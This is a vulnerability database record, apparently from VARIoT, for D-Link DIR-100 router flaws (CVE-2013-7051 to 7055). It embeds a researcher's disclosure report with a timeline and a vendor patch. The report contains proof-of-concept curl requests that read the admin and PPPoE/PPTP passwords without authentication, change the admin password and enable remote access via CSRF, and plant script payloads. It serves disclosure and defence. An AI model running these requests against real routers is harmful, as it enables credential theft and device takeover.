curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit'

4 Severity and Remediation

These exploits are considered very critical, especially when the remote administration feature is activated on the system.
Weak authentication, together with cross-site request forgery and authentication bypass, can result in a full device compromise from an arbitrary website the victim is accessing, even if the device has remote administration deactivated on the internet port. It is recommended to upgrade the router to the newest firmware for the D-Link DIR-100; the report header lists 4.03B13 as the patched software.

5 Timeline

2013-09-13 - First Contact with D-Link Support
2013-09-19 - Sent Report
2013-10-14 - Request Status update, Response: Beta will be available mid October
2013-12-02 - Vendor publishes Firmware Update
2013-12-11 - Request CVE-IDs
2013-12-18 - Publish the report



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202002-0670",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-100",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "4.03b07"
      },
      {
        "model": "dir-100",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-100",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "dir-100  firmware  4.03b07"
      },
      {
        "model": "dir-100 ethernet broadband router 4.03b07",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-100 4.03b07",
        "scope": null,
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-100 4.03b13",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01479"
      },
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007144"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7055"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Felix Richter",
    "sources": [
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "PACKETSTORM",
        "id": "125041"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-039"
      }
    ],
    "trust": 1.0
  },
  "cve": "CVE-2013-7055",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2013-7055",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.9,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.8,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2014-01479",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2013-7055",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2013-7055",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2013-7055",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "NVD",
            "id": "CVE-2013-7055",
            "trust": 0.8,
            "value": "Critical"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2014-01479",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202002-039",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULMON",
            "id": "CVE-2013-7055",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01479"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-7055"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007144"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-039"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7055"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-100 4.03B07 has PPTP and poe information disclosure. D-Link DIR-100 Contains a vulnerability related to insufficient protection of credentials.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. The D-Link DIR-100 Ethernet Broadband Router fails to properly restrict special access to users, allowing remote attackers to exploit vulnerabilities without having to verify the submission request and obtain information such as PPTP, POE, and Dyndns username and password. D-Link DIR-100 is prone to the following security vulnerabilities:\n1. An authentication-bypass vulnerability\n2. Multiple information-disclosure vulnerabilities\n3. A cross-site request-forgery vulnerability\n4. A cross-site scripting vulnerability\nAn attacker can exploit these issues to execute HTML and arbitrary  script code in the browser of an unsuspecting user in the context of the  affected device, steal cookie-based authentication credentials,  bypass-authentication mechanism, gain access to potentially sensitive information. Other attacks are also possible. 
* Title: Router D-Link DIR-100 Multiple Vulnerabilities\n* Date: 2013-12-18\n* Author: Felix Richter\n* Contact: root@euer.krebsco.de\n* Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip\n* Patched Software:    ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip\n* Report Version: 2.0\n* Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt\n* Vulnerable: D-Link DIR-100\n    * Hardware Revision: D1\n    * Software Version: 4.03B07 (from 2012-04-10)\n* CVE Numbers: \n    * CWE-287 Authentication Issues:             CVE-2013-7051\n    * CWE-255 Issues with Credential Management: CVE-2013-7052\n    * CWE-352 Cross-Site Request Forgery:        CVE-2013-7053\n    * CWE-79  Cross-Site Scripting:              CVE-2013-7054\n    * CWE-200 Information Disclosure:            CVE-2013-7055\n* Google Dork: \"D-Link Systems\" inurl:bsc_internet.htm D1\n* State: Patched by Vendor\n* Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8\n\n# Table of Contents\n\n    1. Background\n    2. Technical Description\n    4. Severity and Remediation\n    5. Timeline\n\n# 1. Background\n\nThe DIR-100 is designed for easy and robust connectivity among heterogeneous\nstandards-based network devices. Computers can communicate directly with this\nrouter for automatic opening and closing of UDP/TCP ports to take full\nadvantage of the security provided without sacrificing functionality of on-line\napplications. 
\n\n# 2 Vulnerability Description\n\nMultiple vulnerabilities have been found in the D-Link DIR-100 Ethernet\nBroadband Router Revision D (and potentially other devices sharing the \naffected firmware) that could allow a remote attacker:\n\n - Retrieve the Administrator password without authentication leading to\n   authentication bypass [CWE-255]\n - Retrieve sensitive configuration paramters like the pppoe username and\n   password without authentication [CWE-200]\n - Execute privileged Commands without authentication through a race\n   condition leading to weak authentication enforcement [CWE-287]\n - Sending formatted request to a victim which then will execute arbitrary\n   commands on the device (CSRF) [CWE-352]\n - Store arbitrary javascript code which will be executed when a victim\n   accesses the administrator interface [CWE-79]\n\nCVE-Numbers for these vulnerabilities has not yet been assigned. \n\n# 3 Technical Description of the Vulnerabilities\n\n## 3.0 The DIR-100 Web Interface and CGI\n\nThe DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for\nunauthenticated users and `/cli.cgi` for authenticated requests. \n\nlist of features provided by each cgi-script can be retrieved by:\n\n    curl \u0027http://192.168.1.104/cliget.cgi?cmd=help\u0027\n    # and respectively when authenticated\n    curl \u0027http://192.168.1.104/cli.cgi?cmd=help\u0027\n\n## 3.1 Authentication Bypass\n\n### Description\n\nThe administrator password is not protected in any way on the device, every\nattacker with access to the administrator interface which listens on port 80. \nFor retrieving the Administrator password the request must not be\nauthenticated. 
\n\n\n### Proof of Concept\n\nThe web interface provides two distinct ways to retrieve the adminstrator\npassword:\n\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$sys_user1\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary\u0027\n\n## 3.2 Weak Authentication\n\n### Description\n\nAs soon as a user is logged into the administration interface, the cli CGI\nis `unlocked` and can be used by without authenticating before as\nthe cgi-script does not check any other authentication parameters such as\ncookies or HTTP Parameters. The only access check is if the IP-Address is \nthe same. \n\n### Proof of Concept\n    \n    # open the router interface in a web browser and log in\n    firefox  \u0027http://192.168.0.1/\u0027 \n    \n    # open a new terminal or another web-browser which is currently not logged\n    # in and try to access\n\n    curl \u0027http://192.168.0.1/cli.cgi?cmd=help\u0027\n\n    # this request will be authenticated and it will not be redirected to the\n    # login page. If no user is logged in, the request will be redirected to\n    # the login \n\n## 3.3 Retrieve sensitive information\n\n### Description\n\nBesides retrieving the administrator password without authentication it is\npossible to retrieve other sensitive configuration from the device as well like\nthe PPTP and poe Username and Password, as well as the configured dyndns\nusername and password and configured mail log credentials when these parameters\nare configured. \nNo authentication is requred. 
\n\n### Proof of Concept\n\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$ddns1\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$poe_user\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$poe_pass\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$pptp_user\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$pptp_pass\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$log_mail_user\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd\u0027\n\n## 3.4 Cross-Site Request Forgery (CSRF)\n\n### Description\n\nCSRF attacks can be launched by sending a formatted request to a victim, then\ntricking the victim into loading the request (often automatically), which\nmakes it appear that the request came from the victim. As an example the\nattacker could change the administrator password (see Proof of Concept code)\nand enable system remote access. \n\n### Proof of Concept\n\nChanging the password for administrator can be done when the ip-address is\nauthenticated:\n\n    # Log into DIR-100\n    curl -X POST -d \u0027uname=admin\u0026pws=password\u0026login=Login\u0027 \u0027http://192.168.0.1/login.htm\u0027\n\n    # Change password\n    curl \u0027http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin\u0026pass=c%;$sys_passHash=4%25;commit\u0027\n\n    # enable remote console\n    curl \u0027http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit\u0027\n\n## 3.5 Cross-Site Scripting (XSS)\n\n### Description\n\nIt is possible for an authenticated user to store information on the server\nwhich will not be checked on the server side for special characters which\nresults in persistent Cross-Site Scripting Vulnerabilities. With this\nvulnerabilty the victim (administrator) will run javascript code in the \ncontext of the D-Link DIR-100. 
\n\nXSS is possible because only on the client side (javascript code) the input is\nfiltered and validated, sending data directly to the CGI scripts. \n\n### Proof of Concept\n\n    # Log into DIR-100\n    curl -X POST -d \u0027uname=admin\u0026pws=password\u0026login=Login\u0027 \u0027http://192.168.0.1/login.htm\u0027\n\n    #  XSS in Static IP Address Tab\n    curl \u0027http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=\u003cscript\u003ealert(1)\u003c/script\u003e%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp=\u0027\n\n    # XSS in Scheduler tab\n    curl \u0027http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=\u003cscript\u003ealert(1)\u003c/script\u003e%26use=0%26idx=2%26;commit\u0027\n\n# 4 Severity and Remediation\n\nThis exploits are considered very critical, especially when the feature of remote\nadministration is activated on the system.  \nWeak authentication, together with cross-site request forgery and authentication \nbypass can result in a full device compromise from an arbitrary website the victim is\naccessing, even if the device has remote administration deactivated on the\ninternet-port. It is recommended to upgrade the router with the newest firmware\nof the D-Link DIR-100. \n\n# 5 Timeline\n\n2013-09-13 - First Contact with D-Link Support\n2013-09-19 - Sent Report\n2013-10-14 - Request Status update, Response: Beta will be available mid October\n2013-12-02 - Vendor publishes Firmware Update \n2013-12-11 - Request CVE-IDs\n2013-12-18 - Publish the report\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-7055"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007144"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-01479"
      },
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-7055"
      },
      {
        "db": "PACKETSTORM",
        "id": "125041"
      }
    ],
    "trust": 2.61
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=31425",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2013-7055"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2013-7055",
        "trust": 3.5
      },
      {
        "db": "BID",
        "id": "65290",
        "trust": 2.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007144",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-01479",
        "trust": 0.6
      },
      {
        "db": "NSFOCUS",
        "id": "45769",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-039",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "31425",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-7055",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "125041",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01479"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-7055"
      },
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007144"
      },
      {
        "db": "PACKETSTORM",
        "id": "125041"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-039"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7055"
      }
    ]
  },
  "id": "VAR-202002-0670",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01479"
      }
    ],
    "trust": 1.6
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01479"
      }
    ]
  },
  "last_update_date": "2024-11-23T21:36:11.547000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top\u00a0Page",
        "trust": 0.8,
        "url": "http://www.dlink.lt/en/"
      },
      {
        "title": "Patch for D-Link DIR-100 Information Disclosure Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/44085"
      },
      {
        "title": "D-Link DIR-100 Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=107311"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01479"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007144"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-039"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-522",
        "trust": 1.0
      },
      {
        "problemtype": "Insufficient protection of credentials (CWE-522) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007144"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7055"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90903"
      },
      {
        "trust": 2.4,
        "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
      },
      {
        "trust": 1.7,
        "url": "https://www.securityfocus.com/bid/65290/info"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7055"
      },
      {
        "trust": 0.6,
        "url": "http://www.nsfocus.net/vulndb/45769"
      },
      {
        "trust": 0.4,
        "url": "http://more.dlink.de/sicherheit/news.html#news8"
      },
      {
        "trust": 0.3,
        "url": "http://www.dlink.com/"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/fulldisclosure/2014/feb/4"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/522.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.securityfocus.com/bid/65290"
      },
      {
        "trust": 0.1,
        "url": "https://www.exploit-db.com/exploits/31425/"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.104/cli.cgi?cmd=help\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$pptp_user\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$pptp_pass\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7052"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$log_mail_user\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7051"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=\u003cscript\u003ealert(1)\u003c/script\u003e%26use=0%26idx=2%26;commit\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.104/cliget.cgi?cmd=help\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$sys_user1\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/login.htm\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7053"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=\u003cscript\u003ealert(1)\u003c/script\u003e%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp=\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$poe_user\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin\u0026pass=c%;$sys_passhash=4%25;commit\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7054"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$poe_pass\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$ddns1\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cli.cgi?cmd=help\u0027"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01479"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-7055"
      },
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007144"
      },
      {
        "db": "PACKETSTORM",
        "id": "125041"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-039"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7055"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01479"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-7055"
      },
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007144"
      },
      {
        "db": "PACKETSTORM",
        "id": "125041"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-039"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7055"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-03-06T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2014-01479"
      },
      {
        "date": "2020-02-04T00:00:00",
        "db": "VULMON",
        "id": "CVE-2013-7055"
      },
      {
        "date": "2013-12-03T00:00:00",
        "db": "BID",
        "id": "65290"
      },
      {
        "date": "2020-02-17T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-007144"
      },
      {
        "date": "2014-02-03T23:36:22",
        "db": "PACKETSTORM",
        "id": "125041"
      },
      {
        "date": "2020-02-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202002-039"
      },
      {
        "date": "2020-02-04T14:15:12.450000",
        "db": "NVD",
        "id": "CVE-2013-7055"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-03-06T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2014-01479"
      },
      {
        "date": "2020-02-04T00:00:00",
        "db": "VULMON",
        "id": "CVE-2013-7055"
      },
      {
        "date": "2013-12-03T00:00:00",
        "db": "BID",
        "id": "65290"
      },
      {
        "date": "2020-02-17T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-007144"
      },
      {
        "date": "2020-12-31T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202002-039"
      },
      {
        "date": "2024-11-21T02:00:15.093000",
        "db": "NVD",
        "id": "CVE-2013-7055"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-039"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link\u00a0DIR-100\u00a0 Vulnerable to insufficient protection of credentials",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007144"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-039"
      }
    ],
    "trust": 0.6
  }
}

var-202002-0669
Vulnerability from variot

D-Link DIR-100 contains a cross-site scripting vulnerability. Information may be obtained and altered. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. It fails to properly filter the input of the static IP address tab or the scheduler tab, which allows a remote attacker to build a malicious URI, entice a user to open it, and then obtain sensitive cookies, hijack sessions or perform malicious operations on the client side. D-Link DIR-100 is prone to the following security vulnerabilities:
1. An authentication-bypass vulnerability
2. Multiple information-disclosure vulnerabilities
3. A cross-site request-forgery vulnerability
4. A cross-site scripting vulnerability
An attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass the authentication mechanism, and gain access to potentially sensitive information. Other attacks are also possible.
